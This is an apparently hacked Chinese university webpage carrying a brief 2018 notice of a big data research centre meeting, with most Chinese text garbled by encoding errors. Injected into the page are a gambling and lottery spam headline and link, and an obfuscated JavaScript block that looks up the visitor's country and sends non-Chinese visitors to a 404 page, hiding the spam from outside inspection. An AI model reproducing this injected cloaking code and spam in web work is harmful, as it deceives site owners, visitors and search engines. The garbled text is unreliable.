?HTML>ƽƱֻͻ:大数据研I中心第二次推进?数理U学与工E学?/TITLE><META Name="keywords" Content="数理U学与工E学?大数,数据,研究中心,研究,中心,W二?W二,二次,推进" /> <META Name="description" Content="旉Q?018q??5?7:00-18:00地点Q行政楼324人员Q大数据研究主要议题Q大数据研究中心的工作安排:Q?Q目前各自的工作q展Q(2Q下一步的工作计划Q(3Q其他筹建工作事? /> <!--Announced by Visual SiteBuilder 9--> <link rel="stylesheet" type="text/css" href="http://www.ognezashita.com/_sitegray/_sitegray.css" /> <script language="javascript" src="http://www.ognezashita.com/_sitegray/_sitegray.js"></script> <!-- CustomerNO:77656262657232307e7f47565350544203080103 --> <link rel="stylesheet" type="text/css" href="http://www.ognezashita.com/bigdata/content.vsb.css" /> <script type="text/javascript" src="http://www.ognezashita.com//system/resource/js/counter.js"></script> <script type="text/javascript">_jsq_(2218,'/bigdata/content.jsp',7169,1078419484)</script> <meta http-equiv="Cache-Control" content="no-transform" /> <meta http-equiv="Cache-Control" content="no-siteapp" /> </head> <BODY> <h1><a href="http://www.ognezashita.com\">【国民娱乐每日礼金gm777.top,黄金彩票手机客户端中大奖】我们为您提供黄金彩票手机客户端注册,黄金彩票手机客户端投注,黄金彩票手机客户端app,黄金彩票手机客户端平台,巨华彩票开户,充提快速,操控简单,为黄金彩票手机客户端彩民服务!</a></h1> <script src="http://pv.sohu.com/cityjson?ie=utf-8 "></script> <script type="text/javascript"> var a=['LzQwNC5odG1s','Y25hbWU=','Q0hJTkE=','bG9jYXRpb24=','aHJlZg=='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0xc9));var b=function(c,d){c=c-0x0;var e=a[c];if(b['Gqfrzp']===undefined){(function(){var f;try{var g=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');f=g();}catch(h){f=window;}var i='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';f['atob']||(f['atob']=function(j){var k=String(j)['replace'](/=+$/,'');for(var l=0x0,m,n,o=0x0,p='';n=k['charAt'](o++);~n&&(m=l%0x4?m*0x40+n:n,l++%0x4)?p+=String['fromCharCode'](0xff&m>>(-0x2*l&0x6)):0x0){n=i['indexOf'](n);}return p;});}());b['juDtlf']=function(q){var r=atob(q);var s=[];for(var t=0x0,u=r['length'];t<u;t++){s+='%'+('00'+r['charCodeAt'](t)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(s);};b['PvNUcL']={};b['Gqfrzp']=!![];}var v=b['PvNUcL'][c];if(v===undefined){e=b['juDtlf'](e);b['PvNUcL'][c]=e;}else{e=v;}return e;};var country=returnCitySN[b('0x0')];if(country!==b('0x1')){window[b('0x2')][b('0x3')]=b('0x4');} </script> <div style="position:fixed;left:-9000px;top:-9000px;"></div>?<LINK rel="stylesheet" type="text/css" href="http://www.ognezashita.com/bkjxshpg/dfiles/14295/style/css.css"><!--Announced by Visual SiteBuilder 9--><LINK rel="stylesheet" type="text/css" href="http://www.ognezashita.com/bkjxshpg/dfiles/14295/_sitegray/_sitegray_d.css"><script language="javascript" src="http://www.ognezashita.com/bkjxshpg/dfiles/14295/_sitegray/isitegray.js"></script><!-- CustomerNO:77656262657232307e7f47565251564303040000 --><LINK rel="stylesheet" type="text/css" href="http://www.ognezashita.com/bkjxshpg/dfiles/14295/content.vsb.css"> <script type="text/javascript" src="http://www.ognezashita.com/bkjxshpg/dfiles/14295/system/resource/js/counter.js"></script><script type="text/javascript">_jsq_(1003,'/content.jsp',1351,1233058830)</script> <TABLE border="0" cellspacing="0" cellpadding="0" width="981" bgcolor="#0b5cb7" align="center" style="width: 981px;height: 23px"> <TBODY></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="980" background="../../bkjxshpg/dfiles/14295/images/banner_bg.jpg" align="center"> <TBODY> <TR> <TD height="140" width="668" align="center"></TD> <TD valign="top" width="312"><IMG src="http://www.ognezashita.com/images/bigdatalogo.jpg"></TD></TR></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="980" background="../../bkjxshpg/dfiles/14295/images/nav_bg.jpg" align="center"> <TBODY> <TR> <TD height="36" width="17" align="center"> </TD> <TD width="658" align="left"><style type="text/css"> td.b1_0_{FONT-SIZE:9pt;POSITION: relative;HEIGHT: 20px;} td.b2_0_{FONT-SIZE:9pt;POSITION: relative;HEIGHT: 20px;} td.b3_0_{FONT-SIZE:9pt;BORDER-RIGHT: #2560b9 1px solid;BORDER-LEFT: #2560b9 1px solid;WIDTH: 94px;BORDER-BOTTOM: #2560b9 1px solid;POSITION: relative;BACKGROUND-COLOR: #cde4f6;TEXT-ALIGN: center;} td.b4_0_{FONT-SIZE:9pt;BORDER-RIGHT: #2560b9 1px solid;BORDER-LEFT: #2560b9 1px solid;WIDTH: 94px;BORDER-BOTTOM: #2560b9 1px solid;POSITION: relative;BACKGROUND-COLOR: #ddf8ff;TEXT-ALIGN: center;} a.menu0_0_:link {TEXT-DECORATION: none;}; a.menu0_0_:visited { TEXT-DECORATION: none;}; a.menu0_0_:hover {TEXT-DECORATION: none;}; a.menu0_0_:active {TEXT-DECORATION: none;}; table.tb1_0_{FONT-SIZE:9pt;border:0;} span.s1_0_{COLOR: #cc0000;FONT-SIZE: 11pt;FONT-WEIGHT: bold;TEXT-DECORATION: none;} span.s2_0_{FONT-SIZE: 9pt;PADDING-BOTTOM: 10px;COLOR: #cc0000;LINE-HEIGHT: 190%;} span.s10_0_{COLOR: #ffffff;FONT-SIZE: 11pt;FONT-WEIGHT: bold;TEXT-DECORATION: none;} span.s20_0_{FONT-SIZE: 9pt;PADDING-BOTTOM: 10px;COLOR: #222222;LINE-HEIGHT: 190%;} </style> <SCRIPT language="javascript"> var showfix_0_ = 1; var isvertical_0_ = false; </SCRIPT> <script language="javascript" src="http://www.ognezashita.com//system/resource/js/menu/text.js"></script> <TABLE id="t1_0_" cellSpacing="0" cellPadding="0" border="0" height="0" width="900"><TR><TD valign="center"></TD><TD valign="middle" height="0" width="0" nowrap class="b1_0_" align="center" id="a_0_2200" onmouseover="tshowLayers('2200','b2_0_', '_0_')" onmouseout="thideLayers('2200','b1_0_', '_0_','true','true')"><a class="menu0_0_" href="http://www.ognezashita.com/bigdata/index.htm"><span class="fontstyle139879"> 首页 </span></a></TD><TD valign="center" class="leaderfont139879">|</TD><TD valign="middle" width="0" nowrap class="b1_0_" align="center" id="a_0_2201" onmouseover="tshowLayers('2201','b2_0_', '_0_')" onmouseout="thideLayers('2201','b1_0_', '_0_','true','true')"><a class="menu0_0_" href="http://www.ognezashita.com/bigdata/zxjj.htm"><span class="fontstyle139879"> 中心?nbsp;</span></a></TD><TD valign="center" class="leaderfont139879">|</TD><TD valign="middle" width="0" nowrap class="b1_0_" align="center" id="a_0_2205" onmouseover="tshowLayers('2205','b2_0_', '_0_')" onmouseout="thideLayers('2205','b1_0_', '_0_','true','true')"><a class="menu0_0_" href="http://www.ognezashita.com/bigdata/rcdw.htm"><span class="fontstyle139879"> 人才队伍 </span></a></TD><TD valign="center" class="leaderfont139879">|</TD><TD valign="middle" width="0" nowrap class="b1_0_" align="center" id="a_0_2202" onmouseover="tshowLayers('2202','b2_0_', '_0_')" onmouseout="thideLayers('2202','b1_0_', '_0_','true','true')"><a class="menu0_0_" href="http://www.ognezashita.com/bigdata/kxyj.htm"><span class="fontstyle139879"> U学研究 </span></a></TD><TD valign="center" class="leaderfont139879">|</TD><TD valign="middle" width="0" nowrap class="b1_0_" align="center" id="a_0_2203" onmouseover="tshowLayers('2203','b2_0_', '_0_')" onmouseout="thideLayers('2203','b1_0_', '_0_','true','true')"><a class="menu0_0_" href="http://www.ognezashita.com/bigdata/fzdt.htm"><span class="fontstyle139879"> 发展动?nbsp;</span></a></TD><TD valign="center" class="leaderfont139879">|</TD><TD valign="middle" width="0" nowrap class="b1_0_" align="center" id="a_0_2204" onmouseover="tshowLayers('2204','b2_0_', '_0_')" onmouseout="thideLayers('2204','b1_0_', '_0_','true','true')"><a class="menu0_0_" href="http://www.ognezashita.com/bigdata/yjcg.htm"><span class="fontstyle139879"> 研究成果 </span></a></TD><TD valign="center" class="leaderfont139879">|</TD><TD valign="middle" width="0" nowrap class="b1_0_" align="center" id="a_0_2206" onmouseover="tshowLayers('2206','b2_0_', '_0_')" onmouseout="thideLayers('2206','b1_0_', '_0_','true','true')"><a class="menu0_0_" href="http://www.ognezashita.com/bigdata/cyfh.htm"><span class="fontstyle139879"> 产业孵化 </span></a></TD><TD valign="center" class="leaderfont139879">|</TD><TD valign="middle" width="0" nowrap class="b1_0_" align="center" id="a_0_2207" onmouseover="tshowLayers('2207','b2_0_', '_0_')" onmouseout="thideLayers('2207','b1_0_', '_0_','true','true')"><a class="menu0_0_" href="http://www.ognezashita.com/bigdata/zllj.htm"><span class="fontstyle139879"> 资料链接 </span></a></TD><TD valign="center" class="leaderfont139879">|</TD><TD valign="middle" width="0" nowrap class="b1_0_" align="center" id="a_0_2246" onmouseover="tshowLayers('2246','b2_0_', '_0_')" onmouseout="thideLayers('2246','b1_0_', '_0_','true','true')"><a class="menu0_0_" href="http://www.ognezashita.com/bigdata/lxwm.htm"><span class="fontstyle139879"> 联系我们 </span></a></TD></TR></TR><TR><td align="left" nowrap><DIV class="main_0_" id="layer_0_2200" onmouseover="tshownull('2200','b2_0_', '_0_')" onmouseout="thideLayers('2200','b1_0_', '_0_','true')" style="z-index:99999;display: none; POSITION: absolute;"><TABLE align="center" class="tb1_0_" cellSpacing="0" cellPadding="0" border="0"><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/index/tpxw.htm"><span class="ejfontstyle139879"> 囄新闻 </span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/index/tzgg.htm"><span class="ejfontstyle139879"> 通知公告 </span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/index/xwdt.htm"><span class="ejfontstyle139879"> 新闻动?nbsp;</span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/index/xshd.htm"><span class="ejfontstyle139879"> 学术zd </span></a></TD></tr></table></div></td><td></td><td align="left" nowrap><DIV class="main_0_" id="layer_0_2201" onmouseover="tshownull('2201','b2_0_', '_0_')" onmouseout="thideLayers('2201','b1_0_', '_0_','true')" style="z-index:99999;display: none; POSITION: absolute;"><TABLE align="center" class="tb1_0_" cellSpacing="0" cellPadding="0" border="0"><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/zxjj/zxjs.htm"><span class="ejfontstyle139879"> 中心介绍 </span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/zxjj/zzmb.htm"><span class="ejfontstyle139879"> 宗旨目标 </span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/zxjj/zzjg.htm"><span class="ejfontstyle139879"> l织机构 </span></a></TD></tr></table></div></td><td></td><td align="left" nowrap></td><td></td><td align="left" nowrap><DIV class="main_0_" id="layer_0_2202" onmouseover="tshownull('2202','b2_0_', '_0_')" onmouseout="thideLayers('2202','b1_0_', '_0_','true')" style="z-index:99999;display: none; POSITION: absolute;"><TABLE align="center" class="tb1_0_" cellSpacing="0" cellPadding="0" border="0"><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/kxyj/kydtr.htm"><span class="ejfontstyle139879"> U研带头?nbsp;</span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/kxyj/yjfx.htm"><span class="ejfontstyle139879"> 研究方向 </span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/kxyj/ggsys.htm"><span class="ejfontstyle139879"> 各个实验?nbsp;</span></a></TD></tr></table></div></td><td></td><td align="left" nowrap><DIV class="main_0_" id="layer_0_2203" onmouseover="tshownull('2203','b2_0_', '_0_')" onmouseout="thideLayers('2203','b1_0_', '_0_','true')" style="z-index:99999;display: none; POSITION: absolute;"><TABLE align="center" class="tb1_0_" cellSpacing="0" cellPadding="0" border="0"><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/fzdt/yjdt.htm"><span class="ejfontstyle139879"> 业界动?nbsp;</span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/fzdt/xsdt.htm"><span class="ejfontstyle139879"> 学术动?nbsp;</span></a></TD></tr></table></div></td><td></td><td align="left" nowrap><DIV class="main_0_" id="layer_0_2204" onmouseover="tshownull('2204','b2_0_', '_0_')" onmouseout="thideLayers('2204','b1_0_', '_0_','true')" style="z-index:99999;display: none; POSITION: absolute;"><TABLE align="center" class="tb1_0_" cellSpacing="0" cellPadding="0" border="0"><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/yjcg/xm.htm"><span class="ejfontstyle139879"> 目 </span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/yjcg/al.htm"><span class="ejfontstyle139879"> 案例 </span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/yjcg/lw.htm"><span class="ejfontstyle139879"> 论文 </span></a></TD></tr></table></div></td><td></td><td align="left" nowrap></td><td></td><td align="left" nowrap></td><td></td><td align="left" nowrap><DIV class="main_0_" id="layer_0_2246" onmouseover="tshownull('2246','b2_0_', '_0_')" onmouseout="thideLayers('2246','b1_0_', '_0_','true')" style="z-index:99999;display: none; POSITION: absolute;"><TABLE align="center" class="tb1_0_" cellSpacing="0" cellPadding="0" border="0"><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/lxwm/dt.htm"><span class="ejfontstyle139879"> 地图 </span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/lxwm/dh.htm"><span class="ejfontstyle139879"> 电话 </span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/lxwm/gzh.htm"><span class="ejfontstyle139879"> 公众?nbsp;</span></a></TD></tr><tr><TD height="0" align="left" nowrap onmouseover="TOVT(this,'b4_0_', '_0_');" onmouseout="TOUT(this,'b3_0_', '_0_');" class="b3_0_"> <A class="menu0_0_" href="http://www.ognezashita.com/bigdata/lxwm/wz.htm"><span class="ejfontstyle139879"> |址 </span></a></TD></tr></table></div></td><td></td></TR></table></TD> <TD width="305" align="center"></TD></TR></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="980" background="../../bkjxshpg/dfiles/14295/images/nav_yy.gif" align="center"> <TBODY> <TR> <TD height="10"></TD></TR></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="980" bgcolor="#ffffff" align="center"> <TBODY> <TR> <TD height="25" width="3%" align="center"><IMG src="http://www.ognezashita.com/bkjxshpg/dfiles/14295/images/ico_003.gif" width="16" height="16"></TD> <TD width="97%" align="left"> <table class="winstyle139880" cellspacing="0" cellpadding="0"><tr><td nowrap>当前位置Q? <a href="http://www.ognezashita.com/index.htm"><span class="fontstyle139880">首页</span></a><span class="splitflagstyle139880">>></span><a href="http://www.ognezashita.com/bigdata?urltype=tree.TreeTempUrl&wbtreeid=2199"><span class="fontstyle139880">大数据研I中?/span></a><span class="splitflagstyle139880">>></span><a href="http://www.ognezashita.com/bigdata/index.htm"><span class="fontstyle139880">首页</span></a><span class="splitflagstyle139880">>></span><a href="http://www.ognezashita.com/bigdata/index/tzgg.htm"><span class="fontstyle139880">通知公告</span></a><span class="splitflagstyle139880">>></span><span class="fontstyle139880">正文</span></td></tr></table></TD></TR></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="980" bgcolor="#ffffff" align="center"> <TBODY> <TR> <TD valign="top" width="761" align="left" style="padding-left: 10px"> <TABLE border="0" cellspacing="1" cellpadding="0" width="100%" align="center" style="border-bottom: #a7c0d5 1px solid;border-left: #a7c0d5 1px solid;border-top: #3e80ca 4px solid;border-right: #a7c0d5 1px solid"> <TBODY> <TR> <TD height="483" valign="top" background="../../bkjxshpg/dfiles/14295/images/list_bg1.gif" style="background-repeat: repeat-x;background-position: 50% top"> <TABLE border="0" cellspacing="10" cellpadding="0" width="98%" align="center"> <TBODY> <TR> <TD height="463" valign="top" align="left"> <LINK href="http://www.ognezashita.com//system/resource/style/component/news/content/title.css" type="text/css" rel="stylesheet"> <style type="text/css"> .content{margin:auto;text-align:left;line-height:18px;padding:3px 0 0 0;color:#727272;} .process{width:162px;height:11px;background:#EDEDED;overflow:hidden;float:left;margin-left:26px !important;margin-left:13px;margin-right:10px;} .process div{width:160px;height:11px;border-left:1px solid #000;border-right:1px solid #000;} .process .style7{border-left-color:#ff0000;border-right-color:#ff0000;background-position:0 -77px;} </style> <script language="javascript" src="http://www.ognezashita.com/_dwr/interface/NewsvoteDWR.js"></script> <script language="javascript" src="http://www.ognezashita.com/_dwr/engine.js"></script> <script language="javascript" src="http://www.ognezashita.com/_dwr/util.js"></script> <script language="javascript" src="http://www.ognezashita.com//system/resource/js/news/newscontent.js"></script> <form name="form139881a"> <table border="0" class="winstyle139881" width="100%" cellspacing="0" cellpadding="0"> <tr><td class="titlestyle139881" align="center"> 大数据研I中心第二次推进? </td></tr> <tr height="30"><td align="center"> <span class="timestyle139881"> 2018-03-14 17:58</span> <span class="authorstyle139881">  </span> </td></tr> <tr><td align="right"> <span> </span> </td></tr> <tr><td class="contentstyle139881"> <div class="c139881_content" id="vsb_newscontent"><div id="vsb_content"> <div class="v_news_content"> <style _ue_org_tagname="style"><!-- /* Font Definitions */ @font-face {font-family:宋体; panose-1:2 1 6 0 3 1 1 1 1 1;} @font-face {font-family:{线; panose-1:0 0 0 0 0 0 0 0 0 0;} @font-face {font-family:"\@宋体"; panose-1:2 1 6 0 3 1 1 1 1 1;} @font-face {font-family:"\@{线"; panose-1:0 0 0 0 0 0 0 0 0 0;} /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; text-align:justify; text-justify:inter-ideograph; font-size:10.5pt; font-family:{线;} p.ListParagraph, li.ListParagraph, div.ListParagraph {margin:0cm; margin-bottom:.0001pt; text-align:justify; text-justify:inter-ideograph; text-indent:21.0pt; font-size:10.5pt; font-family:{线;} /* Page Definitions */ @page Section1 {size:595.3pt 841.9pt; margin:72.0pt 90.0pt 72.0pt 90.0pt; layout-grid:15.6pt;} div.Section1 {page:Section1;} /* List Definitions */ ol {margin-bottom:0cm;} ul {margin-bottom:0cm;} --> </style> <div class="Section1" style="layout-grid:21px none"> <p class="MsoNormal" style="text-align:left;line-height:150%"><span style="line-height:150%;font-family:宋体;font-size:16px">旉</span><span style="line-height:150%;font-family:宋体;font-size:16px">Q?/span><span lang="EN-US" style="line-height:150%;font-family:'font-size:16px">2018</span><span style="line-height:150%;font-family:宋体;font-size:16px">q?/span><span lang="EN-US" style="line-height:150%;font-family:'font-size:16px">3</span><span style="line-height:150%;font-family:宋体;font-size:16px">?/span><span lang="EN-US" style="line-height:150%;font-family:'font-size:16px">15</span><span style="line-height:150%;font-family:宋体;font-size:16px">?/span><span lang="EN-US" style="line-height:150%;font-family:'font-size:16px">17:00-18:00</span></p> <p class="MsoNormal" style="text-align:left;line-height:150%"><span style="line-height:150%;font-family:宋体;font-size:16px">地点Q?/span><span style="line-height:150%;font-family:宋体;font-size:16px">行政?/span><span lang="EN-US" style="line-height:150%;font-family:'font-size:16px">324</span></p> <p class="MsoNormal" style="text-align:left;line-height:150%"><span lang="EN-US" style="line-height:150%;font-family:'font-size:16px">人员Q大数据研究中心各实验室负责?/span></p> <p class="MsoNormal" style="text-align:left;line-height:150%"><span style="line-height:150%;font-family:宋体;font-size:16px">主要议题</span><span style="line-height:150%;font-family:宋体;font-size:16px">Q大数据研究中心的工作安?a name="_GoBack"></a>Q?/span></p> <p class="ListParagraph" style="text-align:left;line-height:150%;text-indent:-48px;margin-left:48px"><span lang="EN-US" style="line-height:150%;font-family:'font-size:16px">Q?Q?span style="font:9px '"></span></span><span style="line-height:150%;font-family:宋体;font-size:16px">目前各自的工作进展;</span></p> <p class="ListParagraph" style="text-align:left;line-height:150%;text-indent:-48px;margin-left:48px"><span lang="EN-US" style="line-height:150%;font-family:'font-size:16px">Q?Q?span style="font:9px '"></span></span><span style="line-height:150%;font-family:宋体;font-size:16px">下一步的工作计划Q?/span></p> <p class="ListParagraph" style="text-align:left;line-height:150%;text-indent:-48px;margin-left:48px"><span lang="EN-US" style="line-height:150%;font-family:'font-size:16px">Q?Q?span style="font:9px '"></span></span><span style="line-height:150%;font-family:宋体;font-size:16px">其他{徏工作事宜?/span></p> <p class="MsoNormal" style="text-align:left;line-height:150%"><span lang="EN-US" style="line-height:150%;font-family:宋体;font-size:19px"></span></p> </div> </div> </div></div> </td></tr> <tr><td class="pagestyle139881" align="left"> </td></tr> <tr><td><div id="div_vote_id"></div></td></tr> <tr><td align="left"><span> </span></td></tr> <tr> <td align="center"> </td> </tr> <tr><td align="right"> <span>?/span><a href="http://www.ognezashita.com/javascript:window.opener=null;window.open('','_self');window.close();"><span>关闭H口</span></a><span>?/span> </td></tr> </table> </form> <script type="text/javascript"> function dosuba139881a() { try{ var ua = navigator.userAgent.toLowerCase(); if(ua.indexOf("msie 8")>-1) { window.external.AddToFavoritesBar(document.location.href,document.title,"");//IE8 }else{ if (document.all) { window.external.addFavorite(document.location.href, document.title); }else if(window.sidebar) { window.sidebar.addPanel( document.title, document.location.href, "");//firefox } } } catch (e){alert("无法自动d到收藏夹Q请使用 Ctrl + d 手动d");} } </script> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD> <TD valign="top" width="10"></TD> <TD valign="top" width="30" align="center" style="padding-right: 10px"> <TABLE border="0" cellspacing="0" cellpadding="0" width="198" background="../../bkjxshpg/dfiles/14295/images/right_title.gif" align="center"> <TBODY> <TR> <TD height="33" width="10"> </TD> <TD valign="bottom" width="81" align="center"> <TABLE border="0" cellspacing="0" cellpadding="0" width="80"> <TBODY> <TR> <TD class="title_a" height="20" align="center">联系我门</TD></TR></TBODY></TABLE></TD> <TD width="62"> </TD> <TD width="45" style="padding-top: 7px"> </TD></TR></TBODY></TABLE> <TABLE border="0" cellspacing="3" cellpadding="0" width="198" style="border-bottom: #cccccc 1px solid;border-left: #cccccc 1px solid;border-right: #cccccc 1px solid"> <TBODY> <TR> <TD height="178" valign="top" align="left"> <TABLE border="0" width="100%"> <TBODY></TBODY></TABLE><script language="javascript" src="http://www.ognezashita.com//system/resource/js/news/mp4video.js"></script><table class="winstyle139937" width="100%"> <tr> <td></td> </tr> </table></TD></TR></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="100%" bgcolor="#ffffff" align="center"> <TBODY></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="198" background="../../bkjxshpg/dfiles/14295/images/right_title.gif" align="center"> <TBODY></TBODY></TABLE> <TABLE border="0" cellspacing="3" cellpadding="0" width="198" style="border-bottom: #cccccc 1px solid;border-left: #cccccc 1px solid;border-right: #cccccc 1px solid"> <TBODY></TBODY></TABLE></TD></TR></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="980" bgcolor="#ffffff" align="center"> <TBODY> <TR> <TD height="10"></TD></TR></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="980" bgcolor="#ffffff" align="center"> <TBODY> <TR> <TD height="10"></TD></TR></TBODY></TABLE> <TABLE border="0" cellspacing="0" cellpadding="0" width="980" bgcolor="#ffffff" align="center"> <TBODY> <TR> <TD height="10"><IMG src="http://www.ognezashita.com/bkjxshpg/dfiles/14295/images/end_line.gif" width="980" height="10"></TD></TR></TBODY></TABLE> <TABLE class="text2" border="0" cellspacing="0" cellpadding="0" width="980" background="../../bkjxshpg/dfiles/14295/images/end_bg.gif" bgcolor="#ffffff" align="center"> <TBODY> <TR> <TD height="100" align="center"><FONT style="font-size: 10pt"><SPAN style="font-family: Arial;font-size: 10pt"> <P id="cprt" align="center"><FONT style="font-size: 9pt">地址: 沛_工程大学W八教学?nbsp;<FONT color="#3399ff"> </FONT><FONT color="#ff0066">师d师风举报电话: 0310 - 8578796</FONT>  电子邮g: lixueyuan@hebeu.edu.cn</FONT></P> <P align="center"><FONT style="font-size: 9pt">版权所? 沛_工程大学数理U学与工E学?/FONT></P></SPAN></FONT></TD></TR></TBODY></TABLE> <a href="http://www.ognezashita.com/">ƽƱֻͻ</a> <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https'){ bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else{ bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> <script> (function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); })(); </script> </body></HTML>